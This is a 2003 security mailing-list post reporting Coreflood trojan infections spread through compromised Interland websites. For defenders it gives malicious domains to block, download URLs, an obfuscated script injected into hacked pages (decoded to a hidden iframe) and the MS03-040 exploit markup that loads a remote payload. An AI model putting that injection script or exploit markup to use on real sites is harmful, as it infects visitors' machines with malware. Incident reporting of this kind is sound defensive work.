Security Incidents mailing list archives

RE: New Trojan

From: "James C. Slora, Jr." <james.slora () phra com>
Date: Thu, 30 Oct 2003 16:19:09 -0500

Rejected by the moderator last time I tried to post on this topic. New
backdoor.coreflood infections today from the same name string. This time
ftp.goling2003.com at IP 66.98.178.33, wvw.goling2003.com at
216.40.230.17 and vvv.goling2003.com at 216.40.230.17.

wvw.goling2003.com was again the source of the infection.

Downloads:
http://vvv.goling2003.com:53/stop.bat
http://vvv.goling2003.com:53/inf.ooo
ftp.goling2003.com/ap216.exe (different type of log - URL may be
incomplete)

I DO think that the "goling" and "chinesenaming" strings are
persistently relevant, and are not mere one-time distractions. 

Block
*.goling.com
*.goling2003.com
*.chinesenaming.com

Not a comprehensive list, but these are the ones I have seen repeatedly.

IP addresses are irrelevant for blocking purposes. They have changed
several times.

There have been at least three mass compromises of Interland sites, and
all three times the Coreflood author has redirected to sites with these
types of names. The code changes, the exploit changes, and the IP
addresses change - but he loves his aliases. They seem to be preferred
signature strings of the author. Failing to find these strings in logs
does not mean you are safe, but finding them gives you a reason to
worry.

Yet again today, a compromised Interland site redirected to the malware
site. It appended the following script to the end of each page on the
compromised site:
<script type="text/javascript">
document.write("\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u
0072\u0063\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0077\u0076\u
0077\u002e\u0067\u006f\u006c\u0069\u006e\u0067\u0032\u0030\u0030\u0033\u
002e\u0063\u006f\u006d\u002f\u006d\u0061\u0069\u006e\u002e\u0068\u0074\u
006d\u006c\u0020\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0030\u0020\u
0068\u0065\u0069\u0067\u0068\u0074\u003d\u0030\u0020\u0066\u0072\u0061\u
006d\u0065\u0062\u006f\u0072\u0064\u0065\u0072\u003d\u0030\u0020\u006d\u
0061\u0072\u0067\u0069\u006e\u0077\u0069\u0064\u0074\u0068\u003d\u0030\u
0020\u006d\u0061\u0072\u0067\u0069\u006e\u0068\u0065\u0069\u0067\u0068\u
0074\u003d\u0030\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u
003e");
</script>

IE is bright enough to run the script even though it comes after the
</HTML> tag.

The Unicode string is just ASCII expressed as Unicode. It converts to
hex:
%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%77%76%77%2e%67
%6f%6c%69%6e%67%32%30%30%33%2e%63%6f%6d%2f%6d%61%69%6e%2e%68%74%6d%6c%20
%20%77%69%64%74%68%3d%30%20%68%65%69%67%68%74%3d%30%20%66%72%61%6d%65%62
%6f%72%64%65%72%3d%30%20%6d%61%72%67%69%6e%77%69%64%74%68%3d%30%20%6d%61
%72%67%69%6e%68%65%69%67%68%74%3d%30%3e%3c%2f%69%66%72%61%6d%65%3e

Which converts to:
<iframe src=http://wvw.goling2003.com/main.html  width=0 height=0
frameborder=0 marginwidth=0 marginheight=0></iframe>
Just your basic iframe, invoked by a script.

But that page does use an exploit fixed in MS03-040 to force
installation of arbitrary code:
<span 
datasrc="#oa" 
datafld="ea" 
dataformatas="html">
</span> 
<xml id="oa">
<se> 
<ea>
<![CDATA[ 
<object 
data="http://vvv.goling2003.com:53/inf.ooo"; width=0 height=0>
</object> 
]]>
</ea> 
</se> 
</xml>

-----Original Message-----
From: James C. Slora, Jr. 
Sent: Monday, October 27, 2003 4:32 PM
To: 'incidents () securityfocus com'
Subject: RE: New Trojan


John Tran wrote:

Was this trojan discuss in Microsoft Security Bulletins?

If so what number

or KB?


Coreflood variants have been installed by visiting 
compromised Web sites using exploits fixed in MS03-040 and 
MS03-032. I'm sure there are many other vectors of infection.

Visits to sites whose names contain the strings 
"chinesenaming" or "goling" are particularly suspect as 
sources of infection. These strings (and maybe others too) 
were used in redirects from hacked Interland sites in 
September and October.

216.247.117.225 was the most recent IP address I've seen 
associated with the hostile sites.


---------------------------------------------------------------------------
Network with over 10,000 of the brightest minds in information security
at the largest, most highly-anticipated industry event of the year.
Don't miss RSA Conference 2004! Choose from over 200 class sessions and
see demos from more than 250 industry vendors. If your job touches
security, you need to be here. Learn more or register at
http://www.securityfocus.com/sponsor/RSA_incidents_031023
and use priority code SF4.
----------------------------------------------------------------------------

Current thread:

Re: New Trojan, (continued)
- Re: New Trojan sean (Oct 25)
- Re: New Trojan Jay Castaldo (Oct 27)
  - Re: New Trojan Damian Gerow (Oct 27)
  - RE: New Trojan Chris Fussell (Oct 27)
- RE: New Trojan Tran, John (Oct 27)
  - Re: New Trojan Damian Gerow (Oct 27)
- RE: New Trojan Matt Vaughan (Oct 28)
- Re: New Trojan Jay Castaldo (Oct 28)
- RE: New Trojan Thompson, Jason (Oct 28)
- RE: New Trojan David LeBlanc (Oct 28)
- RE: New Trojan James C. Slora, Jr. (Oct 31)